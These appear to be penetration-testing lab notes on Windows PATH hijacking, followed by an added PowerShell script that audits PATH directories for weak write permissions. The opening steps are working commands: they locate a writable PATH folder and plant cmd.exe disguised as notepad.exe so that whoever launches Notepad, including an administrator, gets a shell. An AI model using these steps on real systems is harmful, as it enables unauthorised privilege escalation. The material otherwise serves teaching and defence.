First: Take a look at the Path Environment Variable

reg query "HKLM\System\CurrentControlSet\Control\Session Manager\Environment"


Notice that there is an entry called C:\RTO\Bin. If we can write to that directory we can hijack the execution of any program that is launched by bare name, because Windows resolves the name through the PATH entries in order and will pick up our file if this entry is searched before the directory holding the real binary.

Second: Checking if we have write access to that folder

icacls C:\RTO\bin


And we have Modify (M) access to that folder.

Third: Copy your malicious payload to that folder

copy C:\Windows\System32\cmd.exe C:\RTO\bin\notepad.exe


Now anyone who opens Notepad from CMD will get a new CMD session instead. Let's try this as an administrator:

notepad.exe


And the resulting CMD session runs as administrator.
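To find this misconfiguration on a host without checking one folder at a time, here is an added PowerShell audit script (not part of the original notes) that reads the machine-wide PATH from the same registry key, walks every entry in search order, and reports each directory that Everyone, Users, Authenticated Users or INTERACTIVE is allowed to write to. It assumes an elevated PowerShell session on the host being checked; the list of principals and the rights mask are my own choices.

```powershell
# Added audit script, not from the original notes.
# Assumes an elevated PowerShell 5.1+ session on the host being checked.
$regKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
$systemPath = (Get-ItemProperty -Path $regKey -Name Path).Path

# Principals that should never be able to write into a PATH directory.
$weakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# Rights sufficient to plant or replace an executable in the directory.
$writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

$position = 0
foreach ($entry in ($systemPath -split ';' | Where-Object { $_.Trim() -ne '' })) {
    $position++
    # Expand placeholders such as %SystemRoot% before touching the filesystem.
    $dir = [Environment]::ExpandEnvironmentVariables($entry.Trim())

    if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
        # A PATH entry that does not exist is still searched, so check who can create it.
        Write-Output ("[{0,2}] MISSING  {1}" -f $position, $dir)
        continue
    }

    $acl = Get-Acl -LiteralPath $dir
    $risky = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $weakPrincipals -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights) -band ([int]$writeMask)) -ne 0
    }

    if ($risky) {
        $who = ($risky | ForEach-Object { "$($_.IdentityReference.Value): $($_.FileSystemRights)" }) -join '; '
        Write-Output ("[{0,2}] WRITABLE {1}  <- {2}" -f $position, $dir, $who)
    } else {
        Write-Output ("[{0,2}] ok       {1}" -f $position, $dir)
    }
}
```

Lower position numbers are searched first, so a WRITABLE entry that sits before C:\Windows\System32 is the dangerous case shown in these notes; the fix is to remove the entry or tighten its ACL so that only Administrators and SYSTEM can write to it.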